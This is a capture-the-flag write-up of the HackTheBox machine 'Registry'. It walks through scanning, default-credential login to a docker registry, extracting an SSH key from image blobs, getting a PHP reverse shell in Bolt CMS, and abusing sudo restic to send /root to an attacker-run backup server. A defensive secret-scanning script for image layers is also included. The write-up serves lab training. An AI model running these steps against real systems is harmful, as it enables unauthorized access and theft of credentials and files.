Registry was a 40 pts box on HackTheBox and it was rated as “Hard”. It had a private docker registry that was protected with a common password, allowing an attacker to pull the docker image. The docker image had a private ssh key for a user on the host. The box also had a CMS installed called Bolt; the admin password of this CMS was crackable with a common wordlist. A downgrade of privileges to www-data was required, because www-data was able to run a backup program called restic with root privileges. After backing up juicy files an attacker could obtain the root user.
As always, I started with nmap
λ ~/Desktop/htb/machines/registry nmap -sVCS -T5 -oA nmap/initial 10.10.10.159
The SSL certificate revealed a subdomain
I added both names to my /etc/hosts file
10.10.10.159 registry.htb docker.registry.htb
λ ~/Desktop/htb/machines/registry gobuster dir -u https://registry.htb/ -w /opt/SecLists/Discovery/Web-Content/common.txt -x php,html -t 50 -k
I got the links below from the first directory brute force
The response from this endpoint didn’t look like a normal html file, it looked like binary data
I downloaded the index file of this endpoint to see what kind of file it was
It turned out to be a gzip file
The gzip archive contained a CA certificate and a readme file.
λ ~/Desktop/htb/machines/registry/install cat readme.md
The readme helped me understand what was going on. At this point I understood that it was a private docker registry and it was probably going to have some docker images that we could work with.
One of the common credential pairs, admin:admin, logged me in
After this point it was pretty obvious that I would be pulling the docker images from this endpoint.
I wanted to enumerate the endpoint https://docker.registry.htb/v2 more
gobuster dir -u https://docker.registry.htb/v2 -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -t 50 -k
/_catalog (Status: 401)
HTTP Basic authentication was being used
λ ~/Desktop/htb/machines/registry curl -H "Authorization: Basic YWRtaW46YWRtaW4=" https://docker.registry.htb/v2/_catalog -k
This docker registry had an image named bolt-image
In order to pull the docker image, installing the CA certificate was necessary
This link below from the readme file explains pretty much everything
You can follow this link below to install docker on kali
service docker start
/root/.ssh/id_rsa was encrypted and it was for
I couldn’t crack it with a wordlist, so I continued enumerating the image; unfortunately there was nothing in it to help crack the key.
This link below explains the infrastructure pretty well.
A blob can be downloaded like the example below
I wrote a small script to extract all blobs
One of the blobs had the passphrase for the ssh key
I removed the passphrase from the ssh key for easier use
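The root cause on this box was a private key and its passphrase baked into image layers. The following is an added example, not part of the original writeup, that scans a layer tarball (the format a registry blob or a `docker save` layer uses) for sensitive paths and secret-looking content; the path and content patterns are my assumptions and the sample layer is constructed inline.

```python
import io
import re
import tarfile

# Assumed patterns: sensitive file paths and contents that should never ship in an image layer.
SECRET_PATH_RE = re.compile(r"(^|/)\.ssh/id_(rsa|dsa|ecdsa|ed25519)$|(^|/)\.bash_history$")
SECRET_CONTENT_RE = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----|passphrase\s*[:=]", re.IGNORECASE)
MAX_SCAN_BYTES = 1_000_000  # skip large binaries to keep the scan cheap

def scan_layer(layer_bytes: bytes) -> list[tuple[str, str]]:
    """Walk one layer tarball and return (member_name, reason) for every suspicious member."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            if SECRET_PATH_RE.search(member.name):
                findings.append((member.name, "sensitive path"))
            if member.size > MAX_SCAN_BYTES:
                continue
            data = tar.extractfile(member).read()
            if SECRET_CONTENT_RE.search(data):
                findings.append((member.name, "secret-looking content"))
    return findings

def build_layer(files: dict[str, bytes]) -> bytes:
    """Construct a gzip'd layer tarball in memory (test fixture, not a real image)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()

# Constructed sample layer: a placeholder key, a shell history file and a harmless file.
SAMPLE_LAYER = build_layer({
    "root/.ssh/id_rsa": b"-----BEGIN RSA PRIVATE KEY-----\nplaceholder\n-----END RSA PRIVATE KEY-----\n",
    "root/.bash_history": b"ssh-keygen -t rsa\n",
    "etc/hostname": b"bolt\n",
})

if __name__ == "__main__":
    for name, reason in scan_layer(SAMPLE_LAYER):
        print(f"{name}: {reason}")
```

Running the same check against every layer of an image before it is pushed to a registry (or as a registry admission step) catches exactly the kind of leak that made this box solvable.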
openssl rsa -in id_rsa -out id_rsa.decoded
I ran linpeas at this point to get a better understanding of the server
There was another endpoint on the webserver which I couldn’t find in the initial enumeration
Linpeas extracted the values from the tables in the sqlite files and I got the admin hash
It cracked with rockyou
We don’t have write permission under
After logging in one can upload files easily. However, there are restrictions.
Luckily we are admin and have control over the web application, so we can modify the configuration files easily.
I modified the config.yml file
I got shell as www-data with a simple php reverse shell
Checking for sudo entries is one of the first things I do when I get a user.
www-data had an entry with root privileges.
www-data@bolt:~$ sudo -l
Some research showed me that restic is a backup program with which one can store files on a backup server.
www-data can store any file of this host on any rest server, nice !
I set up a restic rest server on my kali.
You can use the link below
apt install restic
Forwarding port 8000 to the remote host was necessary for the backup operation
ssh -i .ssh/id_rsa.decoded email@example.com -R 8000:127.0.0.1:8000
Make sure you have an interactive shell at this point as restic is going to ask you to enter the password.
sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8000/ /root
I restored the snapshot locally
restic restore aea5ab4b940c530b9f0679d1da33fc7497958936308d8f9b0c50ebad735ed1b5 --target ~/Desktop/htb/machines/registry/root_backup -r ~/Desktop/htb/machines/registry/backup
After restoring the snapshot, I saw the private ssh key for root, so let’s use it.
And we are root !
Thanks to thek for this box.
Thank you for reading :)